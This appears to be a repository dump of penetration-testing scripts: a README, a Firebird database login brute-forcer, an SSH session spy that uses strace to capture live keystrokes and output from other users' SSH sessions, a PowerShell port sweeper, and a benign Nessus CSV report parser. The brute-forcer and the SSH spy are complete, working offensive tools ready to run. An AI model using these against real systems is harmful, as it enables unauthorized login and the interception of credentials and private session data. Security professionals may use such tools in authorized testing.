├── README.md ├── firebird-bruteforce.sh ├── portsweep.ps1 ├── sshspy.sh └── yanp.sh /README.md: -------------------------------------------------------------------------------- 1 | # Scripts 2 | 3 | **firebird-bruteforce.sh** 4 | 5 | ``` 6 | # Usage: 7 | firebird-bruteforce.sh 8 | 9 | # Example: 10 | firebird-bruteforce.sh 10.1.10.101 SYSDBA pwdlist.txt 11 | ``` 12 | 13 | More information here: https://www.infosecmatter.com/firebird-database-exploitation/ 14 | 15 | --- 16 | 17 | **yanp.sh** 18 | 19 | Yet Another Nessus Parser. 20 | 21 | It will take every Nessus CSV report found in the current working directory and it will parse out the following information from each CSV report: 22 | 23 | - List of found IP addresses 24 | - List of resolved hostnames and corresponding IP addresses 25 | - List of open TCP and UDP ports 26 | - List of URLs (http and https) 27 | - List of vulnerabilities and for every vulnerability: 28 | - List of affected IP addresses 29 | - List of CVEs 30 | 31 | In the end it will also consolidate everything and produce results from all the Nessus reports. 32 | 33 | ``` 34 | # Usage: 35 | cd /directory/with/nessus/results 36 | yanp.sh 37 | ``` 38 | 39 | More information here: https://www.infosecmatter.com/nessus-csv-parser-and-extractor/ 40 | 41 | --- 42 | 43 | **portsweep.ps1** 44 | 45 | A simple port sweeper, which scans list of hosts for an open port. 46 | 47 | It retains results in a file in the current working directory, so it can be interrupted and resumed (it will not scan already scanned hosts again). 48 | 49 | ``` 50 | Import-Module .\portsweep.ps1 51 | 52 | # Usage: 53 | portsweep 54 | 55 | # Example: 56 | portsweep ips.txt 445 57 | 58 | # Check results (find open ports): 59 | gc portsweep.*.txt | select-string True 60 | ``` 61 | -------------------------------------------------------------------------------- /firebird-bruteforce.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # contact@infosecmatter.com 3 | 4 | host="$1" 5 | user="$2" 6 | wordlist="$3" 7 | 8 | if [ ! -f "${wordlist}" ] || [ -z "${user}" ]; then 9 | echo "usage: `basename $0` " 10 | exit 1 11 | fi 12 | 13 | echo "`date`: FireBird login attack on ${host} against ${user} user using ${wordlist} wordlist" 14 | 15 | tr -d '\r' <"${wordlist}" | while read pwd; do 16 | echo "`date`: Trying ${pwd}" 17 | 18 | echo "CONNECT '${host}/3050:a' user '${user}' password '${pwd}';" | isql-fb -q 2>&1 | \ 19 | grep -q "The system cannot find the file specified." && { 20 | echo "Password for user ${user} is: ${pwd}" 21 | exit 0 22 | } 23 | done 24 | 25 | -------------------------------------------------------------------------------- /portsweep.ps1: -------------------------------------------------------------------------------- 1 | Function portsweep { 2 | param($list,$port) 3 | 4 | if (!$port) { 5 | Write-Host "usage: portsweep " 6 | Write-Host " e.g.: portsweep ips.txt 445`n" 7 | return 8 | } 9 | $results = ".\portsweep.$port.txt" 10 | 11 | foreach($line in Get-Content $list) { 12 | $x = (gc $results -EA SilentlyContinue | select-string "^$line,$port,") 13 | if ($x) { 14 | gc $results | select-string "^$line,$port," 15 | continue 16 | } 17 | $output = "$line,$port," 18 | 19 | $c = new-object system.net.sockets.tcpclient 20 | $c.SendTimeout = 500 21 | try { 22 | $c.Connect($line,$port) 23 | } catch {} 24 | if ($c.Connected) { 25 | $output += "True" 26 | } else { 27 | $output += "False" 28 | } 29 | Write-Host "$output" 30 | echo $output >>$results 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /sshspy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # contact@infosecmatter.com 3 | 4 | trap 'rm -f -- ${tmpfile}; exit' INT 5 | 6 | tmpfile="/tmp/$RANDOM$$$RANDOM" 7 | pgrep -a -f '^ssh ' | while read pid a; do echo "OUTBOUND $a $pid"; done >${tmpfile} 8 | pgrep -a -f '^sshd: .*@' | while read pid a; do 9 | tty="${a##*@}" 10 | from="`w | grep ${tty} | awk '{print $3}'`" 11 | echo "INBOUND $a (from $from) $pid" 12 | done >>${tmpfile} 13 | 14 | IFS=$'\n'; select opt in `cat ${tmpfile}`; do 15 | rm -f -- ${tmpfile} 16 | pid="${opt##* }" 17 | wfd="[0-9]" 18 | rfd="[0-9]" 19 | strace -e read,write -xx -s 9999999 -p ${pid} 2>&1 | while read -r a; do 20 | if [[ "${a:0:10}" =~ ^write\(${wfd}, ]] \ 21 | && [ ${#wfd} -le 3 ] \ 22 | && ! [[ "$a" =~ \ =\ 1$ ]]; then 23 | echo -en "`cut -d'"' -f2 <<<${a}`" 24 | elif [[ "${a:0:10}" =~ ^read\(${rfd}, ]] \ 25 | && [ ${#rfd} -le 3 ]; then 26 | echo -en "`cut -d'"' -f2 <<<${a}`" 27 | elif [[ "$a" =~ ^read\((${rfd}+),.*\ =\ [1-9]$ ]]; then 28 | fd="${BASH_REMATCH[1]}" 29 | if [[ "$a" =~ \ =\ 1$ ]]; then 30 | rfd="$fd" 31 | fi 32 | elif [[ "${a:0:10}" =~ ^write\((${wfd}+), ]] \ 33 | && [ ${#wfd} -gt 4 ]; then 34 | fd="${BASH_REMATCH[1]}" 35 | if [[ "${a}" =~ \\x00 ]]; then continue; fi 36 | if [[ "${a}" =~ \ =\ 1$ ]] || [[ "${a}" =~ \"\\x0d\\x0a ]]; then 37 | wfd="$fd" 38 | fi 39 | fi 40 | done 41 | echo ">> SSH session ($opt) closed" 42 | exit 0 43 | done 44 | 45 | -------------------------------------------------------------------------------- /yanp.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Postprocess Nessus scan results exported as CSV and parse out 4 | # vulnerabilities, unique IPs, URLs, open ports and resolved hostnames 5 | # 6 | # Version: 1.0 7 | # Contact: dev@infosecmatter.com 8 | ####################################################################### 9 | 10 | # output file names 11 | out_alive_hosts="hosts.txt" 12 | out_hosts_resolved="hosts.resolved.txt" 13 | out_open_ports="open.ports.txt" 14 | out_url_list="urls.txt" 15 | out_vulns_cve_list="vulns.cve.list.txt" 16 | out_vulns_with_ports="vulns.hosts.with.ports.txt" 17 | out_vulns_without_ports="vulns.hosts.without.ports.txt" 18 | 19 | # start processing 20 | for report in *.csv; do 21 | echo "`date`: processing report ${report}" 22 | 23 | tr -d '\n\r' <"${report}" | sed -e 's/""$[0-9]\+$"/"\n"\1"/g;s/,Plugin Output"/,Plugin Output\n"/g' >"${report}.tmp" 24 | 25 | # # # # # hosts 26 | if [ -f "${report/.csv/}-${out_alive_hosts}" ]; then 27 | echo "`date`: parsing out list of unique hosts seen ..already done" 28 | else 29 | echo "`date`: parsing out list of unique hosts seen" 30 | grep '","[0-9]\+\.[0-9]\+\.[0-9]\+\.[0-9]\+","' <"${report}.tmp" | \ 31 | cut -d',' -f5 | tr -d '"' | sort -V | uniq >"${report}-${out_alive_hosts}.tmp" 32 | mv -f -- "${report}-${out_alive_hosts}.tmp" "${report/.csv/}-${out_alive_hosts}" 33 | fi 34 | 35 | # # # # # resolved hostnames 36 | if [ -f "${report/.csv/}-${out_hosts_resolved}" ]; then 37 | echo "`date`: parsing out list of resolved hostnames ..already done" 38 | else 39 | echo "`date`: parsing out list of resolved hostnames" 40 | grep '[0-9]\+\.[0-9]\+\.[0-9]\+\.[0-9]\+ resolves as ' <"${report}.tmp" | \ 41 | sed -e 's/.*","//g;s/ resolves as//g;s/\.$//g;s/\."$//g;s/$.*$/\L\1/' | sort -V | uniq > "${report}-${out_hosts_resolved}.tmp" 42 | mv -f -- "${report}-${out_hosts_resolved}.tmp" "${report/.csv/}-${out_hosts_resolved}" 43 | fi 44 | 45 | # # # # # urls 46 | if [ -f "${report/.csv/}-${out_url_list}" ]; then 47 | echo "`date`: parsing out list of unique URLs seen ..already done" 48 | else 49 | echo "`date`: parsing out list of unique URLs seen" 50 | sed -e 's/""$[0-9]\+$"/"\n"\1"/g' <"${report}.tmp" | \ 51 | awk -F '"' '/A web server is running on this port/{print $10,$14,$26}' | \ 52 | sort -V | uniq | while read ip port msg; do 53 | if [ "${msg}" == "A web server is running on this port." ]; then 54 | echo "http://${ip}:${port}/" 55 | awk "/^${ip}/{print \$2}" *-${out_hosts_resolved} | sort | uniq | while read host; do 56 | echo "http://${host}:${port}/" 57 | done 58 | elif [[ "${msg}" =~ "A web server is running on this port through" ]]; then 59 | echo "https://${ip}:${port}/" 60 | awk "/^${ip}/{print \$2}" *-${out_hosts_resolved} | sort | uniq | while read host; do 61 | echo "https://${host}:${port}/" 62 | done 63 | else 64 | echo "https://${ip}:${port}/ (NOT SURE !!! $msg)" 65 | awk "/^${ip}/{print \$2}" *-${out_hosts_resolved} | sort | uniq | while read host; do 66 | echo "https://${host}:${port}/ (NOT SURE !!! $msg)" 67 | done 68 | fi 69 | done | sort -V | uniq >"${report}-${out_url_list}.tmp" 70 | mv -f -- "${report}-${out_url_list}.tmp" "${report/.csv/}-${out_url_list}" 71 | fi 72 | 73 | # # # # # open ports 74 | if [ -f "${report/.csv/}-${out_open_ports}" ]; then 75 | echo "`date`: parsing out open ports ..already done" 76 | else 77 | echo "`date`: parsing out open ports" 78 | sed -e 's/""$[0-9]\+$"/"\n"\1"/g' <"${report}.tmp" | \ 79 | awk -F '"' '/was found to be open/{print $10,$14,$12}' | tr ' ' ';' >"${report}-${out_open_ports}.tmp" 80 | mv -f -- "${report}-${out_open_ports}.tmp" "${report/.csv/}-${out_open_ports}" 81 | fi 82 | 83 | # # # # # vulns CVEs 84 | if [ -f "${report/.csv/}-${out_vulns_cve_list}" ]; then 85 | echo "`date`: parsing out vulnerabilities and their CVEs ..already done" 86 | else 87 | echo "`date`: parsing out vulnerabilities and their CVEs" 88 | for sev in Critical High Medium Low None; do 89 | grep "\"${sev}\"" "${report}.tmp" | cut -d'"' -f16 | sort | uniq | grep -v '^$' | while read vuln; do 90 | echo -n "${sev};${vuln};" 91 | grep "\"${vuln}\"" "${report}.tmp" | cut -d '"' -f4 | sort -V | uniq | tr '\n' ',' | sed -e 's/,/, /g;s/, $//' 92 | echo 93 | done 94 | done >"${report}-${out_vulns_cve_list}.tmp" 95 | mv -f -- "${report}-${out_vulns_cve_list}.tmp" "${report/.csv/}-${out_vulns_cve_list}" 96 | fi 97 | 98 | # # # # # vulns affected hosts 99 | if [ -f "${report/.csv/}-${out_vulns_without_ports}" ]; then 100 | echo "`date`: parsing out vulnerabilities and affected hosts ..already done" 101 | else 102 | echo "`date`: parsing out vulnerabilities and affected hosts" 103 | for sev in Critical High Medium Low None; do 104 | grep "\"${sev}\"" "${report}.tmp" | cut -d'"' -f16 | sort | uniq | grep -v '^$' | while read vuln; do 105 | echo -n "${sev};${vuln};" 106 | grep "\"${vuln}\"" "${report}.tmp" | cut -d '"' -f10,14 | sort -V | uniq | tr '\n' ',' | sed -e 's/"/:/g;s/,/, /g;s/, $//g' 107 | echo 108 | done 109 | done >"${report}-${out_vulns_with_ports}.tmp" 110 | mv -f -- "${report}-${out_vulns_with_ports}.tmp" "${report/.csv/}-${out_vulns_with_ports}" 111 | echo "`date`: parsing out vulnerabilities and affected hosts without ports" 112 | while read line; do 113 | vuln="${line%;*}" 114 | ips="${line##*;}" 115 | echo -n "${vuln};" 116 | echo "${ips}" | sed -e 's/:[0-9]\+//g;s/,//g;s/ /\n/g' | sort -V | uniq | tr '\n' ',' | sed -e 's/,/, /g;s/, $//' 117 | echo 118 | done <"${report/.csv/}-${out_vulns_with_ports}" >"${report}-${out_vulns_without_ports}.tmp" 119 | mv -f -- "${report}-${out_vulns_without_ports}.tmp" "${report/.csv/}-${out_vulns_without_ports}" 120 | fi 121 | done 122 | 123 | echo "`date`: done, now consolidating everything" 124 | 125 | echo "`date`: generating ${out_alive_hosts}" 126 | cat *-${out_alive_hosts} | sort -V | uniq > ${out_alive_hosts}.tmp 127 | mv -f ${out_alive_hosts}.tmp ${out_alive_hosts} 128 | 129 | echo "`date`: generating ${out_hosts_resolved}" 130 | cat *-${out_hosts_resolved} | sort -V | uniq > ${out_hosts_resolved}.tmp 131 | mv -f ${out_hosts_resolved}.tmp ${out_hosts_resolved} 132 | 133 | echo "`date`: generating ${out_open_ports}" 134 | cat *-${out_open_ports} | sort -V | uniq > ${out_open_ports}.tmp 135 | mv -f ${out_open_ports}.tmp ${out_open_ports} 136 | 137 | echo "`date`: generating ${out_url_list}" 138 | cat *-${out_url_list} | sort -t/ -k3 -V | uniq > ${out_url_list}.tmp 139 | mv -f ${out_url_list}.tmp ${out_url_list} 140 | 141 | echo "`date`: generating ${out_vulns_cve_list}" 142 | cat *-${out_vulns_cve_list} | cut -d';' -f1,2 | sort | uniq | while read vuln; do 143 | echo -n "${vuln};" 144 | cat *-${out_vulns_cve_list} | grep "^${vuln};" | cut -d';' -f3 | tr -d ',' | tr -s ' ' '\n' | sort -V | uniq | tr '\n' ',' | sed -e 's/,/, /g;s/, $//' 145 | echo 146 | done > ${out_vulns_cve_list}.tmp 147 | for sev in Critical High Medium Low None; do 148 | grep "^${sev};" ${out_vulns_cve_list}.tmp 149 | done > ${out_vulns_cve_list} 150 | rm -f ${out_vulns_cve_list}.tmp 151 | 152 | # # # # # vulns 153 | echo "`date`: generating ${out_vulns_with_ports}" 154 | cat *-${out_vulns_with_ports} | cut -d';' -f1,2 | sort | uniq | while read vuln; do 155 | echo -n "${vuln};" 156 | cat *-${out_vulns_with_ports} | grep "^${vuln};" | cut -d';' -f3 | tr -d ',' | tr -s ' ' '\n' | sort -V | uniq | tr '\n' ',' | sed -e 's/,/, /g;s/, $//' 157 | echo 158 | done > ${out_vulns_with_ports}.tmp 159 | for sev in Critical High Medium Low None; do 160 | grep "^${sev};" ${out_vulns_with_ports}.tmp 161 | done > ${out_vulns_with_ports} 162 | rm -f ${out_vulns_with_ports}.tmp 163 | 164 | echo "`date`: generating ${out_vulns_without_ports}" 165 | cat *-${out_vulns_without_ports} | cut -d';' -f1,2 | sort | uniq | while read vuln; do 166 | echo -n "${vuln};" 167 | cat *-${out_vulns_without_ports} | grep "^${vuln};" | cut -d';' -f3 | tr -d ',' | tr -s ' ' '\n' | sort -V | uniq | tr '\n' ',' | sed -e 's/,/, /g;s/, $//' 168 | echo 169 | done > ${out_vulns_without_ports}.tmp 170 | for sev in Critical High Medium Low None; do 171 | grep "^${sev};" ${out_vulns_without_ports}.tmp 172 | done > ${out_vulns_without_ports} 173 | rm -f ${out_vulns_without_ports}.tmp 174 | 175 | # # # # # cleanup 176 | for report in *.csv; do 177 | echo "`date`: cleaning ${report}.tmp" 178 | rm -f -- "${report}.tmp" 179 | done 180 | 181 | echo "`date`: done" 182 | 183 | --------------------------------------------------------------------------------